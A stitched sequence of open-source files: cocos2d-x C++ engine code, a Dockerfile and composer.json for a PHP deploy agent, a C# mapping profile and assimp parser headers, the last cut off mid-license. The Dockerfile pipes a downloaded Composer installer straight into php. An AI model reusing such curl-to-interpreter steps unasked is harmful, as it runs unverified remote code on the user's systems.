of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCCAMERA_ACTION_H__
#define __CCCAMERA_ACTION_H__
#include "CCActionInterval.h"
NS_CC_BEGIN
class CCCamera;
/**
* @addtogroup actions
* @{
*/
/**
@brief Base class for CCCamera actions
@ingroup Actions
*/
class CC_DLL CCActionCamera : public CCActionInterval //<NSCopying>
{
public:
CCActionCamera()
:m_fCenterXOrig(0)
,m_fCenterYOrig(0)
,m_fCenterZOrig(0)
,m_fEyeXOrig(0)
,m_fEyeYOrig(0)
,m_fEyeZOrig(0)
,m_fUpXOrig(0)
,m_fUpYOrig(0)
,m_fUpZOrig(0)
{}
virtual ~CCActionCamera(){}
// super methods
virtual void startWithTarget(CCNode *pTarget);
virtual CCActionInterval * reverse();
protected:
float m_fCenterXOrig;
float m_fCenterYOrig;
float m_fCenterZOrig;
float m_fEyeXOrig;
float m_fEyeYOrig;
float m_fEyeZOrig;
float m_fUpXOrig;
float m_fUpYOrig;
float m_fUpZOrig;
};
/**
@brief CCOrbitCamera action
Orbits the camera around the center of the screen using spherical coordinates
@ingroup Actions
*/
class CC_DLL CCOrbitCamera : public CCActionCamera //<NSCopying>
{
public:
CCOrbitCamera()
: m_fRadius(0.0)
, m_fDeltaRadius(0.0)
, m_fAngleZ(0.0)
, m_fDeltaAngleZ(0.0)
, m_fAngleX(0.0)
, m_fDeltaAngleX(0.0)
, m_fRadZ(0.0)
, m_fRadDeltaZ(0.0)
, m_fRadX(0.0)
, m_fRadDeltaX(0.0)
{}
~CCOrbitCamera(){}
/** creates a CCOrbitCamera action with radius, delta-radius, z, deltaZ, x, deltaX
@deprecated: This interface will be deprecated sooner or later.
*/
CC_DEPRECATED_ATTRIBUTE static CCOrbitCamera* actionWithDuration(float t, float radius, float deltaRadius, float angleZ, float deltaAngleZ, float angleX, float deltaAngleX);
/** creates a CCOrbitCamera action with radius, delta-radius, z, deltaZ, x, deltaX */
static CCOrbitCamera* create(float t, float radius, float deltaRadius, float angleZ, float deltaAngleZ, float angleX, float deltaAngleX);
/** initializes a CCOrbitCamera action with radius, delta-radius, z, deltaZ, x, deltaX */
bool initWithDuration(float t, float radius, float deltaRadius, float angleZ, float deltaAngleZ, float angleX, float deltaAngleX);
/** positions the camera according to spherical coordinates */
void sphericalRadius(float *r, float *zenith, float *azimuth);
// super methods
virtual CCObject* copyWithZone(CCZone* pZone);
virtual void startWithTarget(CCNode *pTarget);
virtual void update(float time);
protected:
float m_fRadius;
float m_fDeltaRadius;
float m_fAngleZ;
float m_fDeltaAngleZ;
float m_fAngleX;
float m_fDeltaAngleX;
float m_fRadZ;
float m_fRadDeltaZ;
float m_fRadX;
float m_fRadDeltaX;
};
// end of actions group
/// @}
NS_CC_END
#endif //__CCCAMERA_ACTION_H__
<|start_filename|>cocos2dx/actions/CCActionProgressTimer.h<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (C) 2010 <NAME>
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __ACTION_CCPROGRESS_TIMER_H__
#define __ACTION_CCPROGRESS_TIMER_H__
#include "CCActionInterval.h"
NS_CC_BEGIN
/**
* @addtogroup actions
* @{
*/
/**
@brief Progress to percentage
@since v0.99.1
*/
class CC_DLL CCProgressTo : public CCActionInterval
{
public:
/** Initializes with a duration and a percent */
bool initWithDuration(float duration, float fPercent);
virtual CCObject* copyWithZone(CCZone *pZone);
virtual void startWithTarget(CCNode *pTarget);
virtual void update(float time);
public:
/** Creates and initializes with a duration and a percent
@deprecated: This interface will be deprecated sooner or later.
*/
CC_DEPRECATED_ATTRIBUTE static CCProgressTo* actionWithDuration(float duration, float fPercent);
/** Creates and initializes with a duration and a percent */
static CCProgressTo* create(float duration, float fPercent);
protected:
float m_fTo;
float m_fFrom;
};
/**
@brief Progress from a percentage to another percentage
@since v0.99.1
*/
class CC_DLL CCProgressFromTo : public CCActionInterval
{
public:
/** Initializes the action with a duration, a "from" percentage and a "to" percentage */
bool initWithDuration(float duration, float fFromPercentage, float fToPercentage);
virtual CCObject* copyWithZone(CCZone *pZone);
virtual CCActionInterval* reverse(void);
virtual void startWithTarget(CCNode *pTarget);
virtual void update(float time);
public:
/** Creates and initializes the action with a duration, a "from" percentage and a "to" percentage
@deprecated: This interface will be deprecated sooner or later.
*/
CC_DEPRECATED_ATTRIBUTE static CCProgressFromTo* actionWithDuration(float duration, float fFromPercentage, float fToPercentage);
/** Creates and initializes the action with a duration, a "from" percentage and a "to" percentage */
static CCProgressFromTo* create(float duration, float fFromPercentage, float fToPercentage);
protected:
float m_fTo;
float m_fFrom;
};
// end of actions group
/// @}
NS_CC_END
#endif // __ACTION_CCPROGRESS_TIMER_H__
<|start_filename|>cocos2dx/sprite_nodes/CCAnimation.cpp<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (c) 2008-2010 <NAME>
Copyright (c) 2011 Zynga Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCAnimation.h"
#include "textures/CCTextureCache.h"
#include "textures/CCTexture2D.h"
#include "ccMacros.h"
#include "sprite_nodes/CCSpriteFrame.h"
#include "cocoa/CCZone.h"
NS_CC_BEGIN
CCAnimationFrame::CCAnimationFrame()
: m_pSpriteFrame(NULL)
, m_fDelayUnits(0.0f)
, m_pUserInfo(NULL)
{
}
bool CCAnimationFrame::initWithSpriteFrame(CCSpriteFrame* spriteFrame, float delayUnits, CCDictionary* userInfo)
{
setSpriteFrame(spriteFrame);
setDelayUnits(delayUnits);
setUserInfo(userInfo);
return true;
}
CCAnimationFrame::~CCAnimationFrame()
{
CCLOGINFO( "cocos2d: deallocing %s", this);
CC_SAFE_RELEASE(m_pSpriteFrame);
CC_SAFE_RELEASE(m_pUserInfo);
}
CCObject* CCAnimationFrame::copyWithZone(CCZone* pZone)
{
CCZone* pNewZone = NULL;
CCAnimationFrame* pCopy = NULL;
if(pZone && pZone->m_pCopyObject)
{
//in case of being called at sub class
pCopy = (CCAnimationFrame*)(pZone->m_pCopyObject);
}
else
{
pCopy = new CCAnimationFrame();
pNewZone = new CCZone(pCopy);
}
pCopy->initWithSpriteFrame((CCSpriteFrame*)m_pSpriteFrame->copy()->autorelease(),
m_fDelayUnits, m_pUserInfo != NULL ? (CCDictionary*)m_pUserInfo->copy()->autorelease() : NULL);
CC_SAFE_DELETE(pNewZone);
return pCopy;
}
// implementation of CCAnimation
CCAnimation* CCAnimation::animation(void)
{
return CCAnimation::create();
}
CCAnimation* CCAnimation::create(void)
{
CCAnimation *pAnimation = new CCAnimation();
pAnimation->init();
pAnimation->autorelease();
return pAnimation;
}
CCAnimation* CCAnimation::animationWithSpriteFrames(CCArray *frames, float delay/* = 0.0f*/)
{
return CCAnimation::createWithSpriteFrames(frames, delay);
}
CCAnimation* CCAnimation::createWithSpriteFrames(CCArray *frames, float delay/* = 0.0f*/)
{
CCAnimation *pAnimation = new CCAnimation();
pAnimation->initWithSpriteFrames(frames, delay);
pAnimation->autorelease();
return pAnimation;
}
CCAnimation* CCAnimation::animationWithAnimationFrames(CCArray* arrayOfAnimationFrameNames, float delayPerUnit, unsigned int loops)
{
return CCAnimation::create(arrayOfAnimationFrameNames, delayPerUnit, loops);
}
CCAnimation* CCAnimation::create(CCArray* arrayOfAnimationFrameNames, float delayPerUnit, unsigned int loops)
{
CCAnimation *pAnimation = new CCAnimation();
pAnimation->initWithAnimationFrames(arrayOfAnimationFrameNames, delayPerUnit, loops);
pAnimation->autorelease();
return pAnimation;
}
bool CCAnimation::init()
{
return initWithSpriteFrames(NULL, 0.0f);
}
bool CCAnimation::initWithSpriteFrames(CCArray *pFrames, float delay/* = 0.0f*/)
{
CCARRAY_VERIFY_TYPE(pFrames, CCSpriteFrame*);
m_uLoops = 1;
m_fDelayPerUnit = delay;
CCArray* pTmpFrames = CCArray::create();
setFrames(pTmpFrames);
if (pFrames != NULL)
{
CCObject* pObj = NULL;
CCARRAY_FOREACH(pFrames, pObj)
{
CCSpriteFrame* frame = (CCSpriteFrame*)pObj;
CCAnimationFrame *animFrame = new CCAnimationFrame();
animFrame->initWithSpriteFrame(frame, 1, NULL);
m_pFrames->addObject(animFrame);
animFrame->release();
m_fTotalDelayUnits++;
}
}
return true;
}
bool CCAnimation::initWithAnimationFrames(CCArray* arrayOfAnimationFrames, float delayPerUnit, unsigned int loops)
{
CCARRAY_VERIFY_TYPE(arrayOfAnimationFrames, CCAnimationFrame*);
m_fDelayPerUnit = delayPerUnit;
m_uLoops = loops;
setFrames(CCArray::createWithArray(arrayOfAnimationFrames));
CCObject* pObj = NULL;
CCARRAY_FOREACH(m_pFrames, pObj)
{
CCAnimationFrame* animFrame = (CCAnimationFrame*)pObj;
m_fTotalDelayUnits += animFrame->getDelayUnits();
}
return true;
}
CCAnimation::CCAnimation()
: m_fTotalDelayUnits(0.0f)
, m_fDelayPerUnit(0.0f)
, m_fDuration(0.0f)
, m_pFrames(NULL)
, m_bRestoreOriginalFrame(false)
, m_uLoops(0)
{
}
CCAnimation::~CCAnimation(void)
{
CCLOGINFO("cocos2d, deallocing %p", this);
CC_SAFE_RELEASE(m_pFrames);
}
void CCAnimation::addSpriteFrame(CCSpriteFrame *pFrame)
{
CCAnimationFrame *animFrame = new CCAnimationFrame();
animFrame->initWithSpriteFrame(pFrame, 1.0f, NULL);
m_pFrames->addObject(animFrame);
animFrame->release();
// update duration
m_fTotalDelayUnits++;
}
void CCAnimation::addSpriteFrameWithFileName(const char *pszFileName)
{
CCTexture2D *pTexture = CCTextureCache::sharedTextureCache()->addImage(pszFileName);
CCRect rect = CCRectZero;
rect.size = pTexture->getContentSize();
CCSpriteFrame *pFrame = CCSpriteFrame::createWithTexture(pTexture, rect);
addSpriteFrame(pFrame);
}
void CCAnimation::addSpriteFrameWithTexture(CCTexture2D *pobTexture, const CCRect& rect)
{
CCSpriteFrame *pFrame = CCSpriteFrame::createWithTexture(pobTexture, rect);
addSpriteFrame(pFrame);
}
float CCAnimation::getDuration(void)
{
return m_fTotalDelayUnits * m_fDelayPerUnit;
}
CCObject* CCAnimation::copyWithZone(CCZone* pZone)
{
CCZone* pNewZone = NULL;
CCAnimation* pCopy = NULL;
if(pZone && pZone->m_pCopyObject)
{
//in case of being called at sub class
pCopy = (CCAnimation*)(pZone->m_pCopyObject);
}
else
{
pCopy = new CCAnimation();
pNewZone = new CCZone(pCopy);
}
pCopy->initWithAnimationFrames(m_pFrames, m_fDelayPerUnit, m_uLoops);
pCopy->setRestoreOriginalFrame(m_bRestoreOriginalFrame);
CC_SAFE_DELETE(pNewZone);
return pCopy;
}
NS_CC_END
<|start_filename|>cocos2dx/layers_scenes_transitions_nodes/CCTransitionPageTurn.cpp<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright (c) 2009 Sindesso Pty Ltd http://www.sindesso.com/
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCTransitionPageTurn.h"
#include "CCDirector.h"
#include "actions/CCActionInterval.h"
#include "actions/CCActionInstant.h"
#include "actions/CCActionGrid.h"
#include "actions/CCActionPageTurn3D.h"
NS_CC_BEGIN
CCTransitionPageTurn::CCTransitionPageTurn()
{
}
CCTransitionPageTurn::~CCTransitionPageTurn()
{
}
CCTransitionPageTurn * CCTransitionPageTurn::transitionWithDuration(float t, CCScene *scene, bool backwards)
{
return CCTransitionPageTurn::create(t,scene,backwards);
}
/** creates a base transition with duration and incoming scene */
CCTransitionPageTurn * CCTransitionPageTurn::create(float t, CCScene *scene, bool backwards)
{
CCTransitionPageTurn * pTransition = new CCTransitionPageTurn();
pTransition->initWithDuration(t,scene,backwards);
pTransition->autorelease();
return pTransition;
}
/** initializes a transition with duration and incoming scene */
bool CCTransitionPageTurn::initWithDuration(float t, CCScene *scene, bool backwards)
{
// XXX: needed before [super init]
m_bBack = backwards;
if( CCTransitionScene::initWithDuration(t, scene) )
{
// do something
}
return true;
}
void CCTransitionPageTurn::sceneOrder()
{
m_bIsInSceneOnTop = m_bBack;
}
void CCTransitionPageTurn::onEnter()
{
CCTransitionScene::onEnter();
CCSize s = CCDirector::sharedDirector()->getWinSize();
int x,y;
if( s.width > s.height)
{
x=16;
y=12;
}
else
{
x=12;
y=16;
}
CCActionInterval *action = this->actionWithSize(ccg(x,y));
if(! m_bBack )
{
m_pOutScene->runAction
(
CCSequence::create
(
action,
CCCallFunc::create(this, callfunc_selector(CCTransitionScene::finish)),
CCStopGrid::create(),
NULL
)
);
}
else
{
// to prevent initial flicker
m_pInScene->setVisible(false);
m_pInScene->runAction
(
CCSequence::create
(
CCShow::create(),
action,
CCCallFunc::create(this, callfunc_selector(CCTransitionScene::finish)),
CCStopGrid::create(),
NULL
)
);
}
}
CCActionInterval* CCTransitionPageTurn:: actionWithSize(const ccGridSize& vector)
{
if( m_bBack )
{
// Get hold of the PageTurn3DAction
return CCReverseTime::create
(
CCPageTurn3D::create(vector, m_fDuration)
);
}
else
{
// Get hold of the PageTurn3DAction
return CCPageTurn3D::create(vector, m_fDuration);
}
}
NS_CC_END
<|start_filename|>cocos2dx/actions/CCActionTween.cpp<|end_filename|>
/****************************************************************************
Copyright (c) 2010-2012 cocos2d-x.org
Copyright 2009 lhunath (<NAME>)
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCActionTween.h"
NS_CC_BEGIN
CCActionTween* CCActionTween::actionWithDuration(float aDuration, const char* key, float from, float to)
{
return CCActionTween::create(aDuration, key, from, to);
}
CCActionTween* CCActionTween::create(float aDuration, const char* key, float from, float to)
{
CCActionTween* pRet = new CCActionTween();
if (pRet && pRet->initWithDuration(aDuration, key, from, to))
{
pRet->autorelease();
}
else
{
CC_SAFE_DELETE(pRet);
}
return pRet;
}
bool CCActionTween::initWithDuration(float aDuration, const char* key, float from, float to)
{
if (CCActionInterval::initWithDuration(aDuration))
{
m_strKey = key;
m_fTo = to;
m_fFrom = from;
return true;
}
return false;
}
void CCActionTween::startWithTarget(CCNode *pTarget)
{
CCAssert(dynamic_cast<CCActionTweenDelegate*>(pTarget), "target must implement CCActionTweenDelegate");
CCActionInterval::startWithTarget(pTarget);
m_fDelta = m_fTo - m_fFrom;
}
void CCActionTween::update(float dt)
{
dynamic_cast<CCActionTweenDelegate*>(m_pTarget)->updateTweenAction(m_fTo - m_fDelta * (1 - dt), m_strKey.c_str());
}
CCActionInterval* CCActionTween::reverse()
{
return CCActionTween::create(m_fDuration, m_strKey.c_str(), m_fTo, m_fFrom);
}
NS_CC_END
<|start_filename|>cocos2dx/cocoa/CCString.cpp<|end_filename|>
#include "CCString.h"
#include "platform/CCFileUtils.h"
#include "ccMacros.h"
#include <stdlib.h>
#include <stdio.h>
NS_CC_BEGIN
#define kMaxStringLen (1024*100)
CCString::CCString()
:m_sString("")
{}
CCString::CCString(const char * str)
:m_sString(str)
{}
CCString::CCString(const std::string& str)
:m_sString(str)
{}
CCString::CCString(const CCString& str)
:m_sString(str.getCString())
{}
CCString::~CCString()
{
m_sString.clear();
}
CCString& CCString::operator= (const CCString& other)
{
m_sString = other.m_sString;
return *this;
}
bool CCString::initWithFormatAndValist(const char* format, va_list ap)
{
bool bRet = false;
char* pBuf = (char*)malloc(kMaxStringLen);
if (pBuf != NULL)
{
vsnprintf(pBuf, kMaxStringLen, format, ap);
m_sString = pBuf;
free(pBuf);
bRet = true;
}
return bRet;
}
bool CCString::initWithFormat(const char* format, ...)
{
bool bRet = false;
m_sString.clear();
va_list ap;
va_start(ap, format);
bRet = initWithFormatAndValist(format, ap);
va_end(ap);
return bRet;
}
int CCString::intValue() const
{
if (length() == 0)
{
return 0;
}
return atoi(m_sString.c_str());
}
unsigned int CCString::uintValue() const
{
if (length() == 0)
{
return 0;
}
return (unsigned int)atoi(m_sString.c_str());
}
float CCString::floatValue() const
{
if (length() == 0)
{
return 0.0f;
}
return (float)atof(m_sString.c_str());
}
double CCString::doubleValue() const
{
if (length() == 0)
{
return 0.0;
}
return atof(m_sString.c_str());
}
bool CCString::boolValue() const
{
if (length() == 0)
{
return false;
}
if (0 == strcmp(m_sString.c_str(), "0") || 0 == strcmp(m_sString.c_str(), "false"))
{
return false;
}
return true;
}
const char* CCString::getCString() const
{
return m_sString.c_str();
}
unsigned int CCString::length() const
{
return m_sString.length();
}
int CCString::compare(const char * pStr) const
{
return strcmp(getCString(), pStr);
}
CCObject* CCString::copyWithZone(CCZone* pZone)
{
CCAssert(pZone == NULL, "CCString should not be inherited.");
CCString* pStr = new CCString(m_sString.c_str());
return pStr;
}
bool CCString::isEqual(const CCObject* pObject)
{
bool bRet = false;
const CCString* pStr = dynamic_cast<const CCString*>(pObject);
if (pStr != NULL)
{
if (0 == m_sString.compare(pStr->m_sString))
{
bRet = true;
}
}
return bRet;
}
CCString* CCString::stringWithCString(const char* pStr)
{
return CCString::create(pStr);
}
CCString* CCString::create(const std::string& str)
{
CCString* pRet = new CCString(str);
pRet->autorelease();
return pRet;
}
CCString* CCString::stringWithString(const std::string& pStr)
{
CCString* pRet = new CCString(pStr);
pRet->autorelease();
return pRet;
}
CCString* CCString::stringWithData(const unsigned char* pData, unsigned long nLen)
{
return CCString::createWithData(pData, nLen);
}
CCString* CCString::createWithData(const unsigned char* pData, unsigned long nLen)
{
CCString* pRet = NULL;
if (pData != NULL)
{
char* pStr = (char*)malloc(nLen+1);
if (pStr != NULL)
{
pStr[nLen] = '\0';
if (nLen > 0)
{
memcpy(pStr, pData, nLen);
}
pRet = CCString::create(pStr);
free(pStr);
}
}
return pRet;
}
CCString* CCString::stringWithFormat(const char* format, ...)
{
CCString* pRet = CCString::create("");
va_list ap;
va_start(ap, format);
pRet->initWithFormatAndValist(format, ap);
va_end(ap);
return pRet;
}
CCString* CCString::createWithFormat(const char* format, ...)
{
CCString* pRet = CCString::create("");
va_list ap;
va_start(ap, format);
pRet->initWithFormatAndValist(format, ap);
va_end(ap);
return pRet;
}
CCString* CCString::stringWithContentsOfFile(const char* pszFileName)
{
return CCString::createWithContentsOfFile(pszFileName);
}
CCString* CCString::createWithContentsOfFile(const char* pszFileName)
{
unsigned long size = 0;
unsigned char* pData = 0;
CCString* pRet = NULL;
pData = CCFileUtils::sharedFileUtils()->getFileData(pszFileName, "rb", &size);
pRet = CCString::createWithData(pData, size);
CC_SAFE_DELETE_ARRAY(pData);
return pRet;
}
NS_CC_END
<|start_filename|>cocos2dx/cocoa/CCInteger.h<|end_filename|>
#ifndef __CCINTEGER_H__
#define __CCINTEGER_H__
#include "CCObject.h"
NS_CC_BEGIN
/**
* @addtogroup data_structures
* @{
*/
class CC_DLL CCInteger : public CCObject
{
public:
CCInteger(int v)
: m_nValue(v) {}
int getValue() const {return m_nValue;}
// @deprecated: This interface will be deprecated sooner or later.
CC_DEPRECATED_ATTRIBUTE static CCInteger* integerWithInt(int v)
{
return CCInteger::create(v);
}
static CCInteger* create(int v)
{
CCInteger* pRet = new CCInteger(v);
pRet->autorelease();
return pRet;
}
private:
int m_nValue;
};
// end of data_structure group
/// @}
NS_CC_END
#endif /* __CCINTEGER_H__ */
| nickflink/cocos2d-x |
<|start_filename|>infra/docker/Dockerfile<|end_filename|>
FROM php:7.0-apache
# Set default system timezone
RUN ln -sf /usr/share/zoneinfo/Europe/Paris /etc/localtime
# Install last update and php extension
RUN apt-get update && apt-get install -y --no-install-recommends \
vim \
bzip2 \
zip \
unzip \
libbz2-dev \
libmcrypt-dev \
libicu-dev \
&& docker-php-ext-configure mysqli \
&& docker-php-ext-install mysqli pdo_mysql bz2 mcrypt intl \
&& rm -rf /var/lib/apt/lists/*
# Install composer
RUN curl -sS https://getcomposer.org/installer | php \
&& mv composer.phar /usr/bin/composer
# Enable Apache Rewrite module
RUN a2enmod rewrite
# Default Vhost for developement
COPY infra/docker/vhost.conf /etc/apache2/sites-available/000-default.conf
# Implement application
WORKDIR /var/app
COPY . /var/app/
# htaccess specific to docker app
COPY infra/docker/.htaccess public/
# Update project
RUN /usr/bin/composer install --no-dev \
&& ./scripts/post-create-project \
&& chown www-data:www-data -R .
COPY infra/docker/entrypoint.sh /
ENTRYPOINT ["/entrypoint.sh", "apache2-foreground"]
<|start_filename|>composer.json<|end_filename|>
{
"name": "continuousphp/deploy-agent",
"homepage": "https://github.com/continuousphp/deploy-agent",
"description": "Deploy agent for continuousphp",
"type": "project",
"keywords": [
"build",
"tool",
"continuousphp",
"deployment",
"agent"
],
"license": "Apache-2.0",
"support": {
"email": "<EMAIL>",
"source": "https://github.com/continuousphp/deploy-agent",
"issues": "https://github.com/continuousphp/deploy-agent/issues"
},
"config": {
"process-timeout": 5000
},
"require": {
"php": ">=5.5.0",
"ext-pdo_sqlite": "*",
"zendframework/zendframework": "2.5.2",
"doctrine/doctrine-orm-module": "~0.10",
"reprovinci/doctrine-encrypt": "~3.0",
"bushbaby/flysystem": "~1.0",
"continuousphp/sdk": "~0.3"
},
"require-dev": {
"phpunit/phpunit": "4.1.*",
"mikey179/vfsStream": "1.3.*@dev",
"squizlabs/php_codesniffer": "^2.3",
"behat/behat": "^3.0"
},
"autoload": {
"psr-4": {
"Continuous\\DeployAgent\\": "module/DeployAgent/src"
},
"classmap": [
"module/DeployAgent/Module.php"
]
},
"autoload-dev": {
"psr-4": {
"Continuous\\Features\\": "features/bootstrap/"
}
},
"scripts": {
"post-create-project-cmd": "scripts/post-create-project"
}
}
| continuousdemo/deploy-agent |
<|start_filename|>src/Ordering/Ordering.API/Mapping/OrderMapping.cs<|end_filename|>
using AutoMapper;
using EventBusRabbitMQ.Events;
using Ordering.Application.Commands;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
namespace Ordering.API.Mapping
{
public class OrderMapping : Profile
{
public OrderMapping()
{
CreateMap<BasketCheckoutEvent, CheckoutOrderCommand>().ReverseMap();
}
}
}
| jerysun/microshop |
<|start_filename|>assimp/code/Q3BSPFileParser.h<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
#ifndef ASSIMP_Q3BSPFILEPARSER_H_INC
#define ASSIMP_Q3BSPFILEPARSER_H_INC
#include "BaseImporter.h"
#include <string>
namespace Assimp
{
namespace Q3BSP
{
class Q3BSPZipArchive;
struct Q3BSPModel;
class ZipFile;
}
// -------------------------------------------------------------------
// -------------------------------------------------------------------
class Q3BSPFileParser
{
public:
Q3BSPFileParser( const std::string &rMapName, Q3BSP::Q3BSPZipArchive *pZipArchive );
~Q3BSPFileParser();
Q3BSP::Q3BSPModel *getModel() const;
protected:
bool readData(const std::string &rMapName);
bool parseFile();
bool validateFormat();
void getLumps();
void countLumps();
void getVertices();
void getIndices();
void getFaces();
void getTextures();
void getLightMaps();
void getEntities();
private:
size_t m_sOffset;
std::vector<char> m_Data;
Q3BSP::Q3BSPModel *m_pModel;
Q3BSP::Q3BSPZipArchive *m_pZipArchive;
};
} // Namespace Assimp
#endif // ASSIMP_Q3BSPFILEPARSER_H_INC
<|start_filename|>assimp/test/unit/SceneDiffer.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
